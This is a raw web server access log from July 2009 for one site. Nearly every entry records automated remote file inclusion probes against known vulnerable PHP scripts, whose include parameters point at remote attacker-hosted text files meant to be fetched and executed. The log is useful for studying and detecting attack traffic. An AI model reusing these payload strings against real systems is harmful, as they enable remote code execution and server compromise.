88.191.37.60 - - [05/Jul/2009:00:28:46 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
219.94.163.199 - - [05/Jul/2009:00:30:26 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://carding.by.ru/sources/id(trash).txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.hellionindustries.com"
219.94.163.199 - - [05/Jul/2009:00:30:26 -0700] "GET /include/bbs.lib.inc.php?site_path=http://carding.by.ru/sources/id(trash).txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.hellionindustries.com"
219.94.163.199 - - [05/Jul/2009:00:30:27 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://carding.by.ru/sources/id(trash).txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.hellionindustries.com"
195.34.78.110 - - [05/Jul/2009:00:30:37 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:33:08 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:33:08 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:33:08 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:33:45 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:33:45 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:33:45 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
216.117.128.143 - - [05/Jul/2009:00:34:55 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
216.117.128.143 - - [05/Jul/2009:00:34:55 -0700] "GET /logs/access_090521.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
216.117.128.143 - - [05/Jul/2009:00:34:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.70.32.2 - - [05/Jul/2009:00:35:26 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.70.32.2 - - [05/Jul/2009:00:35:33 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
217.70.32.2 - - [05/Jul/2009:00:35:33 -0700] "GET /logs/access_090521.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:36:53 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:37:22 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:44:26 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:44:26 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:44:26 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:44:26 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:44:26 -0700] "GET /logs/access.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:44:32 -0700] "GET /logs/access.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
59.120.3.108 - - [05/Jul/2009:00:44:50 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.saerohands.com/mall/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
59.120.3.108 - - [05/Jul/2009:00:44:50 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.saerohands.com/mall/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
59.120.3.108 - - [05/Jul/2009:00:44:51 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.saerohands.com/mall/admin/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:00:44:52 -0700] "GET /include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:00:44:52 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:00:44:52 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.182.200 - - [05/Jul/2009:00:45:23 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:45:45 -0700] "GET /pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:45:45 -0700] "GET /logs/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:45:45 -0700] "GET /logs/access.log%20%20/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:45:47 -0700] "GET /pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:45:47 -0700] "GET /logs/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:45:47 -0700] "GET /logs/access.log%20%20/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:00:47:12 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:48:45 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [05/Jul/2009:00:48:52 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.38.136.251 - - [05/Jul/2009:00:50:53 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.38.136.251 - - [05/Jul/2009:00:50:53 -0700] "GET /include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.38.136.251 - - [05/Jul/2009:00:50:54 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:52:14 -0700] "GET /logs/access.log/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [05/Jul/2009:00:52:31 -0700] "GET /logs/access.log/pop.php?base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.17.129.100 - - [05/Jul/2009:00:59:14 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.17.129.100 - - [05/Jul/2009:00:59:15 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.17.129.100 - - [05/Jul/2009:00:59:15 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.182.200 - - [05/Jul/2009:01:00:46 -0700] "GET /logs/access_090521.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
72.55.182.200 - - [05/Jul/2009:01:00:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
72.55.182.200 - - [05/Jul/2009:01:00:46 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://a22222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:01:01:13 -0700] "GET /index.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:01:01:13 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:01:01:13 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:01:07:15 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:01:07:15 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [05/Jul/2009:01:07:15 -0700] "GET /index.php?option=com_custompages&cpage=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:09:51 -0700] "GET /logs/access.log%20%20/////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:09:51 -0700] "GET /logs/////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 1522 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:09:51 -0700] "GET ////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 785 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:09:53 -0700] "GET ////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 785 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:09:53 -0700] "GET /logs/access.log%20%20/////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:09:53 -0700] "GET /logs/////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1522 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:10:04 -0700] "GET /logs/access.log/////////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [05/Jul/2009:01:10:07 -0700] "GET /logs/access.log/////////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:23 -0700] "GET /main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:23 -0700] "GET /logs//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:23 -0700] "GET /logs/access.log//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:25 -0700] "GET /logs/access.log//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:25 -0700] "GET /main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:25 -0700] "GET /logs//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:39 -0700] "GET /logs/access.log//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:39 -0700] "GET /logs//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:39 -0700] "GET /main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:55 -0700] "GET /main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:55 -0700] "GET /main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:55 -0700] "GET /logs//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:55 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:55 -0700] "GET /logs/access.log//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:18:56 -0700] "GET /logs//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [05/Jul/2009:01:19:10 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [05/Jul/2009:01:19:10 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [05/Jul/2009:01:19:10 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [05/Jul/2009:01:19:17 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [05/Jul/2009:01:19:17 -0700] "GET /logs/access.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [05/Jul/2009:01:19:18 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:19:39 -0700] "GET /main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:19:39 -0700] "GET /logs//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:19:39 -0700] "GET /logs/access.log//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:22:50 -0700] "GET /logs//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:22:51 -0700] "GET /main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:22:51 -0700] "GET /logs/access_090212.log%20%20//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:23:23 -0700] "GET /logs/access.log//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:23:23 -0700] "GET /main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
61.78.62.84 - - [05/Jul/2009:01:23:24 -0700] "GET /logs//main.php?sayfa=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.17.129.100 - - [05/Jul/2009:01:25:54 -0700] "GET /logs/access.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.17.129.100 - - [05/Jul/2009:01:25:54 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
84.17.129.100 - - [05/Jul/2009:01:25:54 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
80.237.155.83 - - [05/Jul/2009:01:26:25 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
80.237.155.83 - - [05/Jul/2009:01:26:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/os.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
84.17.129.100 - - [05/Jul/2009:01:28:21 -0700] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [05/Jul/2009:01:30:44 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [05/Jul/2009:01:30:44 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
70.85.213.106 - - [05/Jul/2009:01:30:44 -0700] "GET /logs/access.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [05/Jul/2009:01:32:56 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [05/Jul/2009:01:32:56 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
66.11.230.36 - - [05/Jul/2009:01:32:56 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
121.124.127.34 - - [05/Jul/2009:01:33:34 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
121.124.127.34 - - [05/Jul/2009:01:33:34 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
121.124.127.34 - - [05/Jul/2009:01:33:34 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
211.245.23.158 - - [05/Jul/2009:01:33:54 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
211.245.23.158 - - [05/Jul/2009:01:33:54 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
121.124.127.34 - - [05/Jul/2009:01:34:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
121.124.127.34 - - [05/Jul/2009:01:34:39 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
119.245.138.143 - - [05/Jul/2009:01:36:56 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
119.245.138.143 - - [05/Jul/2009:01:36:56 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 780 "-" "Mozilla/5.0" "www.hellionindustries.com"
